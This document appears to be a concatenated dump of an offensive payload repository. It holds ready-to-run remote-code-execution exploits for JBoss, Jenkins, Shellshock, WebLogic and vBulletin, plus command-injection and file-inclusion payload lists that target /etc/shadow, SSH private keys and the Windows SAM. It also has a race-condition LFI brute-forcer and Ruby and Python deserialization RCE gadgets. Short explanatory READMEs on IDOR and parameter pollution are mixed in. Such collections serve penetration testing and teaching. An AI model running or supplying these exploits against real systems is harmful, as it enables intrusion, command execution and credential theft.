print('[-] Target must be in format IP:PORT') 45 | sys.exit(1) 46 | 47 | if not args.command: 48 | print('[-] You must specify a command to run') 49 | sys.exit(1) 50 | 51 | ip, port = args.target.split(':') 52 | 53 | print('[*] Target IP: {}'.format(ip)) 54 | print('[*] Target PORT: {}'.format(port)) 55 | 56 | gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) 57 | 58 | r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) 59 | 60 | if r.status_code == 200: 61 | print('[+] Command executed successfully') 62 | 63 | -------------------------------------------------------------------------------- /CVE Exploits/Jenkins CVE-2016-0792.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python2 2 | 3 | #Jenkins Groovy XML RCE (CVE-2016-0792) 4 | #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins 5 | #Made with <3 by @byt3bl33d3r 6 | 7 | from __future__ import print_function 8 | import requests 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 11 | 12 | import argparse 13 | import sys 14 | 15 | parser = argparse.ArgumentParser() 16 | parser.add_argument('target', type=str, help='Target IP:PORT') 17 | parser.add_argument('command', type=str, help='Command to run on target') 18 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') 19 | 20 | if len(sys.argv) < 2: 21 | parser.print_help() 22 | sys.exit(1) 23 | 24 | args = parser.parse_args() 25 | 26 | if len(args.target.split(':')) != 2: 27 | print('[-] Target must be in format IP:PORT') 28 | sys.exit(1) 29 | 30 | if not args.command: 31 | print('[-] You must specify a command to run') 32 | sys.exit(1) 33 | 34 | ip, port = args.target.split(':') 35 | 36 | print('[*] Target IP: {}'.format(ip)) 37 | print('[*] Target PORT: {}'.format(port)) 38 | 39 | xml_formatted = '' 40 | command_list = args.command.split() 41 | for cmd in command_list: 42 | xml_formatted += '{:>16}{}\n'.format('', cmd) 43 | 44 | xml_payload = ''' 45 | 46 | 47 | 48 | 49 | hashCode 50 | 51 | 52 | 53 | 54 | {} 55 | 56 | false 57 | 58 | 0 59 | 0 60 | 61 | 0 62 | start 63 | 64 | 65 | 66 | 67 | 1 68 | 69 | '''.format(xml_formatted.strip()) 70 | 71 | print('[*] Generated XML payload:') 72 | print(xml_payload) 73 | print() 74 | 75 | print('[*] Sending payload') 76 | headers = {'Content-Type': 'text/xml'} 77 | r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload) 78 | 79 | paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml'] 80 | if r.status_code == 500: 81 | for path in paths_in_trace: 82 | if path in r.text: 83 | print('[+] Command executed successfully') 84 | break 85 | -------------------------------------------------------------------------------- /CVE Exploits/Jenkins Groovy Console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py 3 | # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b 4 | from __future__ import print_function 5 | from builtins import input 6 | import requests 7 | import sys 8 | 9 | print(""" 10 | Jenkins Groovy Console cmd runner. 11 | 12 | usage: ./jgc.py [HOST] 13 | 14 | Then type any command and wait for STDOUT output from remote machine. 15 | Type 'exit' to exit :) 16 | """) 17 | URL = sys.argv[1] + '/scriptText' 18 | HEADERS = { 19 | 'User-Agent': 'jgc' 20 | } 21 | 22 | while 1: 23 | CMD = input(">> Enter command to execute (or type 'exit' to exit): ") 24 | if CMD == 'exit': 25 | print("exiting...\n") 26 | exit(0) 27 | 28 | DATA = { 29 | 'script': 'println "{}".execute().text'.format(CMD) 30 | } 31 | result = requests.post(URL, headers=HEADERS, data=DATA) 32 | print(result.text) -------------------------------------------------------------------------------- /CVE Exploits/Shellshock CVE-2014-6271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Successful Output: 4 | # # python shell_shocker.py 5 | # [+] Attempting Shell_Shock - Make sure to type full path 6 | # ~$ /bin/ls / 7 | # bin 8 | # boot 9 | # dev 10 | # etc 11 | # .. 12 | # ~$ /bin/cat /etc/passwd 13 | 14 | from __future__ import print_function 15 | from future import standard_library 16 | standard_library.install_aliases() 17 | from builtins import input 18 | import sys, urllib.request, urllib.error, urllib.parse 19 | 20 | if len(sys.argv) != 2: 21 | print("Usage: shell_shocker ") 22 | sys.exit(0) 23 | 24 | URL=sys.argv[1] 25 | print("[+] Attempting Shell_Shock - Make sure to type full path") 26 | 27 | while True: 28 | command=input("~$ ") 29 | opener=urllib.request.build_opener() 30 | opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] 31 | try: 32 | response=opener.open(URL) 33 | for line in response.readlines(): 34 | print(line.strip()) 35 | except Exception as e: print(e) 36 | 37 | -------------------------------------------------------------------------------- /CVE Exploits/WebLogic CVE-2017-10271.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import input 3 | import requests 4 | import sys 5 | 6 | url_in = sys.argv[1] 7 | payload_url = url_in + "/wls-wsat/CoordinatorPortType" 8 | payload_header = {'content-type': 'text/xml'} 9 | 10 | 11 | def payload_command (command_in): 12 | html_escape_table = { 13 | "&": "&", 14 | '"': """, 15 | "'": "'", 16 | ">": ">", 17 | "<": "<", 18 | } 19 | command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+"" 20 | payload_1 = " \n" \ 21 | " " \ 22 | " \n" \ 23 | " \n" \ 24 | " \n" \ 25 | " " \ 26 | " " \ 27 | " cmd " \ 28 | " " \ 29 | " " \ 30 | " /c " \ 31 | " " \ 32 | " " \ 33 | + command_filtered + \ 34 | " " \ 35 | " " \ 36 | " " \ 37 | " " \ 38 | " " \ 39 | " " \ 40 | " " \ 41 | " " \ 42 | "" 43 | return payload_1 44 | 45 | def do_post(command_in): 46 | result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) 47 | 48 | if result.status_code == 500: 49 | print("Command Executed \n") 50 | else: 51 | print("Something Went Wrong \n") 52 | 53 | 54 | 55 | print("***************************************************** \n" \ 56 | "**************** Coded By 1337g ****************** \n" \ 57 | "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ 58 | "***************************************************** \n") 59 | 60 | while 1: 61 | command_in = input("Eneter your command here: ") 62 | if command_in == "exit" : exit(0) 63 | do_post(command_in) 64 | -------------------------------------------------------------------------------- /CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh: -------------------------------------------------------------------------------- 1 | curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" -------------------------------------------------------------------------------- /Command Injection/Intruder/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 3 | <!--#exec%20cmd="/usr/bin/id;--> 4 | <!--#exec%20cmd="/usr/bin/id;--> 5 | /index.html|id| 6 | ";id;" 7 | ';id;' 8 | ;id; 9 | ;id 10 | ;netstat -a; 11 | "|id|" 12 | '|id|' 13 | |id 14 | |/usr/bin/id 15 | |id| 16 | "|/usr/bin/id|" 17 | '|/usr/bin/id|' 18 | |/usr/bin/id| 19 | "||/usr/bin/id|" 20 | '||/usr/bin/id|' 21 | ||/usr/bin/id| 22 | |id; 23 | ||/usr/bin/id; 24 | ;id| 25 | ;|/usr/bin/id| 26 | "\n/bin/ls -al\n" 27 | '\n/bin/ls -al\n' 28 | \n/bin/ls -al\n 29 | \n/usr/bin/id\n 30 | \nid\n 31 | \n/usr/bin/id; 32 | \nid; 33 | \n/usr/bin/id| 34 | \nid| 35 | ;/usr/bin/id\n 36 | ;id\n 37 | |usr/bin/id\n 38 | |nid\n 39 | `id` 40 | `/usr/bin/id` 41 | a);id 42 | a;id 43 | a);id; 44 | a;id; 45 | a);id| 46 | a;id| 47 | a)|id 48 | a|id 49 | a)|id; 50 | a|id 51 | |/bin/ls -al 52 | a);/usr/bin/id 53 | a;/usr/bin/id 54 | a);/usr/bin/id; 55 | a;/usr/bin/id; 56 | a);/usr/bin/id| 57 | a;/usr/bin/id| 58 | a)|/usr/bin/id 59 | a|/usr/bin/id 60 | a)|/usr/bin/id; 61 | a|/usr/bin/id 62 | ;system('cat%20/etc/passwd') 63 | ;system('id') 64 | ;system('/usr/bin/id') 65 | %0Acat%20/etc/passwd 66 | %0A/usr/bin/id 67 | %0Aid 68 | %22%0A/usr/bin/id%0A%22 69 | %27%0A/usr/bin/id%0A%27 70 | %0A/usr/bin/id%0A 71 | %0Aid%0A 72 | "& ping -i 30 127.0.0.1 &" 73 | '& ping -i 30 127.0.0.1 &' 74 | & ping -i 30 127.0.0.1 & 75 | & ping -n 30 127.0.0.1 & 76 | %0a ping -i 30 127.0.0.1 %0a 77 | `ping 127.0.0.1` 78 | | id 79 | & id 80 | ; id 81 | %0a id %0a 82 | `id` 83 | $;/usr/bin/id 84 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/BSD-files.txt: -------------------------------------------------------------------------------- 1 | /usr/pkg/etc/httpd/httpd.conf 2 | /usr/local/etc/apache22/httpd.conf 3 | /usr/local/etc/apache2/httpd.conf 4 | /var/www/conf/httpd.conf 5 | /var/www/logs/error_log 6 | /var/www/logs/access_log 7 | /etc/apache2/httpd2.conf 8 | /var/apache2/logs/error_log 9 | /var/apache2/logs/access_log 10 | /var/log/httpd-error.log 11 | /var/log/httpd-access.log 12 | /var/log/httpd/error_log 13 | /var/log/httpd/access_log -------------------------------------------------------------------------------- /File Inclusion/Intruders/LFI-FD-check.txt: -------------------------------------------------------------------------------- 1 | /proc/self/cmdline 2 | /proc/self/stat 3 | /proc/self/status 4 | /proc/self/fd/0 5 | /proc/self/fd/1 6 | /proc/self/fd/2 7 | /proc/self/fd/3 8 | /proc/self/fd/4 9 | /proc/self/fd/5 10 | /proc/self/fd/6 11 | /proc/self/fd/7 12 | /proc/self/fd/8 13 | /proc/self/fd/9 14 | /proc/self/fd/10 15 | /proc/self/fd/11 16 | /proc/self/fd/12 17 | /proc/self/fd/13 18 | /proc/self/fd/14 19 | /proc/self/fd/15 20 | /proc/self/fd/16 21 | /proc/self/fd/17 22 | /proc/self/fd/18 23 | /proc/self/fd/19 24 | /proc/self/fd/20 25 | /proc/self/fd/21 26 | /proc/self/fd/22 27 | /proc/self/fd/23 28 | /proc/self/fd/24 29 | /proc/self/fd/25 30 | /proc/self/fd/26 31 | /proc/self/fd/27 32 | /proc/self/fd/28 33 | /proc/self/fd/29 34 | /proc/self/fd/30 35 | /proc/self/fd/31 36 | /proc/self/fd/32 37 | /proc/self/fd/33 38 | /proc/self/fd/34 39 | /proc/self/fd/35 -------------------------------------------------------------------------------- /File Inclusion/Intruders/LFI-WindowsFileCheck.txt: -------------------------------------------------------------------------------- 1 | php://input 2 | C:\boot.ini 3 | C:\WINDOWS\win.ini 4 | C:\WINDOWS\php.ini 5 | C:\WINDOWS\System32\Config\SAM 6 | C:\WINNT\php.ini 7 | C:\xampp\phpMyAdmin\config.inc 8 | C:\xampp\phpMyAdmin\phpinfo.php 9 | C:\xampp\phpmyadmin\config.inc 10 | C:\xampp\phpmyadmin\phpinfo.php 11 | C:\xampp\phpmyadmin\config.inc.php 12 | C:\xampp\phpMyAdmin\config.inc.php 13 | C:\xampp\apache\conf\httpd.conf 14 | C:\xampp\FileZillaFTP\FileZilla Server.xml 15 | C:\xampp\MercuryMail\mercury.ini 16 | C:\mysql\bin\my.ini 17 | C:\xampp\php\php.ini 18 | C:\xampp\phpMyAdmin\config.inc.php 19 | C:\xampp\tomcat\conf\tomcat-users.xml 20 | C:\xampp\tomcat\conf\web.xml 21 | C:\xampp\sendmail\sendmail.ini 22 | C:\xampp\webalizer\webalizer.conf 23 | C:\xampp\webdav\webdav.txt 24 | C:\xampp\apache\logs\error.log 25 | C:\xampp\apache\logs\access.log 26 | C:\xampp\FileZillaFTP\Logs 27 | C:\xampp\FileZillaFTP\Logs\error.log 28 | C:\xampp\FileZillaFTP\Logs\access.log 29 | C:\xampp\MercuryMail\LOGS\error.log 30 | C:\xampp\MercuryMail\LOGS\access.log 31 | C:\xampp\mysql\data\mysql.err 32 | C:\xampp\sendmail\sendmail.log 33 | C:\apache\log\error.log 34 | C:\apache\log\access.log 35 | C:\apache\log\error_log 36 | C:\apache\log\access_log 37 | C:\apache2\log\error.log 38 | C:\apache2\log\access.log 39 | C:\apache2\log\error_log 40 | C:\apache2\log\access_log 41 | C:\log\error.log 42 | C:\log\access.log 43 | C:\log\error_log 44 | C:\log\access_log 45 | C:\apache\logs\error.log 46 | C:\apache\logs\access.log 47 | C:\apache\logs\error_log 48 | C:\apache\logs\access_log 49 | C:\apache2\logs\error.log 50 | C:\apache2\logs\access.log 51 | C:\apache2\logs\error_log 52 | C:\apache2\logs\access_log 53 | C:\logs\error.log 54 | C:\logs\access.log 55 | C:\logs\error_log 56 | C:\logs\access_log 57 | C:\log\httpd\access_log 58 | C:\log\httpd\error_log 59 | C:\logs\httpd\access_log 60 | C:\logs\httpd\error_log 61 | C:\opt\xampp\logs\access_log 62 | C:\opt\xampp\logs\error_log 63 | C:\opt\xampp\logs\access.log 64 | C:\opt\xampp\logs\error.log 65 | C:\Program Files\Apache Group\Apache\logs\access.log 66 | C:\Program Files\Apache Group\Apache\logs\error.log 67 | C:\Program Files\Apache Group\Apache\conf\httpd.conf 68 | C:\Program Files\Apache Group\Apache2\conf\httpd.conf 69 | C:\Program Files\xampp\apache\conf\httpd.conf 70 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/Linux-files.txt: -------------------------------------------------------------------------------- 1 | /etc/passwd 2 | /etc/group 3 | /etc/hosts 4 | /etc/motd 5 | /etc/issue 6 | /etc/bashrc 7 | /etc/apache2/apache2.conf 8 | /etc/apache2/ports.conf 9 | /etc/apache2/sites-available/default 10 | /etc/httpd/conf/httpd.conf 11 | /etc/httpd/conf.d 12 | /etc/httpd/logs/access.log 13 | /etc/httpd/logs/access_log 14 | /etc/httpd/logs/error.log 15 | /etc/httpd/logs/error_log 16 | /etc/init.d/apache2 17 | /etc/mysql/my.cnf 18 | /etc/nginx.conf 19 | /opt/lampp/logs/access_log 20 | /opt/lampp/logs/error_log 21 | /opt/lamp/log/access_log 22 | /opt/lamp/logs/error_log 23 | /proc/self/environ 24 | /proc/version 25 | /proc/cmdline 26 | /proc/mounts 27 | /proc/config.gz 28 | /root/.bashrc 29 | /root/.bash_history 30 | /root/.ssh/authorized_keys 31 | /root/.ssh/id_rsa 32 | /root/.ssh/id_rsa.keystore 33 | /root/.ssh/id_rsa.pub 34 | /root/.ssh/known_hosts 35 | /usr/local/apache/htdocs/index.html 36 | /usr/local/apache/conf/httpd.conf 37 | /usr/local/apache/conf/extra/httpd-ssl.conf 38 | /usr/local/apache/logs/error_log 39 | /usr/local/apache/logs/access_log 40 | /usr/local/apache/bin/apachectl 41 | /usr/local/apache2/htdocs/index.html 42 | /usr/local/apache2/conf/httpd.conf 43 | /usr/local/apache2/conf/extra/httpd-ssl.conf 44 | /usr/local/apache2/logs/error_log 45 | /usr/local/apache2/logs/access_log 46 | /usr/local/apache2/bin/apachectl 47 | /usr/local/etc/nginx/nginx.conf 48 | /usr/local/nginx/conf/nginx.conf 49 | /var/apache/logs/access_log 50 | /var/apache/logs/access.log 51 | /var/apache/logs/error_log 52 | /var/apache/logs/error.log 53 | /var/log/apache/access.log 54 | /var/log/apache/access_log 55 | /var/log/apache/error.log 56 | /var/log/apache/error_log 57 | /var/log/httpd/error_log 58 | /var/log/httpd/access_log 59 | /var/log/nginx/access_log 60 | /var/log/nginx/access.log 61 | /var/log/nginx/error_log 62 | /var/log/nginx/error.log -------------------------------------------------------------------------------- /File Inclusion/Intruders/Mac-files.txt: -------------------------------------------------------------------------------- 1 | /etc/apache2/httpd.conf 2 | /Library/WebServer/Documents/index.html 3 | /private/var/log/appstore.log 4 | /var/log/apache2/error_log 5 | /var/log/apache2/access_log 6 | /usr/local/nginx/conf/nginx.conf 7 | /var/log/nginx/error_log 8 | /var/log/nginx/access_log -------------------------------------------------------------------------------- /File Inclusion/Intruders/Web-files.txt: -------------------------------------------------------------------------------- 1 | /robots.txt 2 | /humans.txt 3 | /style.css 4 | /configuration.php 5 | wp-login.php 6 | wp-admin.php 7 | /wp-content/plugins 8 | /include/config.php 9 | /inc/config.php 10 | /include/mysql.php 11 | /inc/mysql.php 12 | /sites/defaults/settings.php 13 | /phpmyadmin/changelog.php 14 | web.config -------------------------------------------------------------------------------- /File Inclusion/Intruders/simple-check.txt: -------------------------------------------------------------------------------- 1 | etc/passwd 2 | etc/passwd%00 3 | etc%2fpasswd 4 | etc%2fpasswd%00 5 | etc%5cpasswd 6 | etc%5cpasswd%00 7 | etc%c0%afpasswd 8 | etc%c0%afpasswd%00 9 | C:\boot.ini 10 | C:\WINDOWS\win.ini -------------------------------------------------------------------------------- /File Inclusion/uploadlfi.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import range 3 | import itertools 4 | import requests 5 | import string 6 | import sys 7 | 8 | print('[+] Trying to win the race') 9 | f = {'file': open('shell.php', 'rb')} 10 | for _ in range(4096 * 4096): 11 | requests.post('http://target.com/index.php?c=index.php', f) 12 | 13 | 14 | print('[+] Bruteforcing the inclusion') 15 | for fname in itertools.combinations(string.ascii_letters + string.digits, 6): 16 | url = 'http://target.com/index.php?c=/tmp/php' + fname 17 | r = requests.get(url) 18 | if 'load average' in r.text: # WAF (reads first 'search' param, looks innocent. passes on) --> Origin Service (reads second 'search' param, injection happens if no checks are done here.) 23 | ``` 24 | 25 | ### Table of refence for which technology reads which parameter 26 | When ?par1=a&par1=b 27 | | Technology | Parsing Result |outcome (par1=)| 28 | | ------------------ |--------------- |:-------------:| 29 | | ASP.NET/IIS |All occurrences |a,b | 30 | | ASP/IIS |All occurrences |a,b | 31 | | PHP/Apache |Last occurrence |b | 32 | | PHP/Zues |Last occurrence |b | 33 | | JSP,Servlet/Tomcat |First occurrence |a | 34 | | Perl CGI/Apache |First occurrence |a | 35 | | Python Flask |First occurrence |a | 36 | | Python Django |Last occurrence |b | 37 | | Nodejs |All occurrences |a,b | 38 | | Golang net/http - `r.URL.Query().Get("param")` |First occurrence |a | 39 | | Golang net/http - `r.URL.Query()["param"]` |All occurrences |a,b | 40 | 41 | 42 | ## References 43 | - [HTTP Parameter Pollution - Imperva](https://www.imperva.com/learn/application-security/http-parameter-pollution/) 44 | - [HTTP Parameter Pollution in 11 minutes | Web Hacking - PwnFunction](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction) 45 | - [How to Detect HTTP Parameter Pollution Attacks - Acunetix](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/) -------------------------------------------------------------------------------- /Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php: -------------------------------------------------------------------------------- 1 | 33 | -------------------------------------------------------------------------------- /Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | class Gem::StubSpecification 4 | def initialize; end 5 | end 6 | 7 | 8 | stub_specification = Gem::StubSpecification.new 9 | stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2") 10 | 11 | puts "STEP n" 12 | stub_specification.name rescue nil 13 | puts 14 | 15 | 16 | class Gem::Source::SpecificFile 17 | def initialize; end 18 | end 19 | 20 | specific_file = Gem::Source::SpecificFile.new 21 | specific_file.instance_variable_set(:@spec, stub_specification) 22 | 23 | other_specific_file = Gem::Source::SpecificFile.new 24 | 25 | puts "STEP n-1" 26 | specific_file <=> other_specific_file rescue nil 27 | puts 28 | 29 | 30 | $dependency_list= Gem::DependencyList.new 31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) 32 | 33 | puts "STEP n-2" 34 | $dependency_list.each{} rescue nil 35 | puts 36 | 37 | 38 | class Gem::Requirement 39 | def marshal_dump 40 | [$dependency_list] 41 | end 42 | end 43 | 44 | payload = Marshal.dump(Gem::Requirement.new) 45 | 46 | puts "STEP n-3" 47 | Marshal.load(payload) rescue nil 48 | puts 49 | 50 | 51 | puts "VALIDATION (in fresh ruby process):" 52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| 53 | pipe.print payload 54 | pipe.close_write 55 | puts pipe.gets 56 | puts 57 | end 58 | 59 | puts "Payload (hex):" 60 | puts payload.unpack('H*')[0] 61 | puts 62 | 63 | 64 | require "base64" 65 | puts "Payload (Base64 encoded):" 66 | puts Base64.encode64(payload) -------------------------------------------------------------------------------- /Insecure Deserialization/Python.md: -------------------------------------------------------------------------------- 1 | # Python Deserialization 2 | 3 | ## Pickle 4 | 5 | The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. 6 | 7 | ```python 8 | import cPickle 9 | from base64 import b64encode, b64decode 10 | 11 | class User: 12 | def __init__(self): 13 | self.username = "anonymous" 14 | self.password = "anonymous" 15 | self.rank = "guest" 16 | 17 | h = User() 18 | auth_token = b64encode(cPickle.dumps(h)) 19 | print("Your Auth Token : {}").format(auth_token) 20 | ``` 21 | 22 | The vulnerability is introduced when a token is loaded from an user input. 23 | 24 | ```python 25 | new_token = raw_input("New Auth Token : ") 26 | token = cPickle.loads(b64decode(new_token)) 27 | print "Welcome {}".format(token.username) 28 | ``` 29 | 30 | Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server. 31 | 32 | > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. 33 | 34 | ```python 35 | import cPickle 36 | from base64 import b64encode, b64decode 37 | 38 | class Evil(object): 39 | def __reduce__(self): 40 | return (os.system,("whoami",)) 41 | 42 | e = Evil() 43 | evil_token = b64encode(cPickle.dumps(e)) 44 | print("Your Evil Token : {}").format(evil_token) 45 | ``` 46 | 47 | ## References 48 | 49 | * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) 50 | * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) -------------------------------------------------------------------------------- /Insecure Deserialization/README.md: -------------------------------------------------------------------------------- 1 | # Insecure Deserialization 2 | 3 | > Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP 4 | 5 | Check the following sub-sections, located in other files : 6 | 7 | * [Java deserialization : ysoserial, ...](Java.md) 8 | * [PHP (Object injection) : phpggc, ...](PHP.md) 9 | * [Ruby : universal rce gadget, ...](Ruby.md) 10 | * [Python : pickle, ...](Python.md) 11 | 12 | ## References 13 | 14 | * [Github - ysoserial](https://github.com/frohoff/ysoserial) 15 | * [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) 16 | * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) 17 | * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) 18 | * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 19 | * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) 20 | * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) 21 | * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) 22 | * [PHP unserialize](http://php.net/manual/en/function.unserialize.php) 23 | * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) 24 | * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 25 | * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin 26 | * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 27 | * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) 28 | * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals 29 | * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) 30 | * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh 31 | -------------------------------------------------------------------------------- /Insecure Deserialization/Ruby.md: -------------------------------------------------------------------------------- 1 | # Ruby Deserialization 2 | 3 | ## Marshal.load 4 | 5 | Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 6 | 7 | ```ruby 8 | for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done 9 | ``` 10 | 11 | ## Yaml.load 12 | 13 | Vulnerable code 14 | ```ruby 15 | require "yaml" 16 | YAML.load(File.read("p.yml")) 17 | ``` 18 | 19 | Exploitation code 20 | ```ruby 21 | --- !ruby/object:Gem::Requirement 22 | requirements: 23 | !ruby/object:Gem::DependencyList 24 | specs: 25 | - !ruby/object:Gem::Source::SpecificFile 26 | spec: &1 !ruby/object:Gem::StubSpecification 27 | loaded_from: "|id 1>&2" 28 | - !ruby/object:Gem::Source::SpecificFile 29 | spec: 30 | ``` 31 | 32 | 33 | ## References 34 | 35 | - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 36 | - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) 37 | - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) -------------------------------------------------------------------------------- /Insecure Direct Object References/Images/idor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Insecure Direct Object References/Images/idor.png -------------------------------------------------------------------------------- /Insecure Direct Object References/README.md: -------------------------------------------------------------------------------- 1 | # Insecure Direct Object References 2 | 3 | > Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Exploit](#exploit) 9 | * [Examples](#examples) 10 | * [References](#references) 11 | 12 | ## Tools 13 | 14 | - Burp Suite plugin Authz 15 | - Burp Suite plugin AuthMatrix 16 | - Burp Suite plugin Authorize 17 | 18 | ## Exploit 19 | 20 | ![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png) 21 | 22 | The value of a parameter is used directly to retrieve a database record. 23 | 24 | ```powershell 25 | http://foo.bar/somepage?invoice=12345 26 | ``` 27 | 28 | The value of a parameter is used directly to perform an operation in the system 29 | 30 | ```powershell 31 | http://foo.bar/changepassword?user=someuser 32 | ``` 33 | 34 | The value of a parameter is used directly to retrieve a file system resource 35 | 36 | ```powershell 37 | http://foo.bar/showImage?img=img00011 38 | ``` 39 | 40 | The value of a parameter is used directly to access application functionality 41 | 42 | ```powershell 43 | http://foo.bar/accessPage?menuitem=12 44 | ``` 45 | 46 | ## Examples 47 | 48 | * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) 49 | * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) 50 | 51 | ## References 52 | 53 | * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) 54 | * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) 55 | * [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) 56 | * [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec 57 | * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) 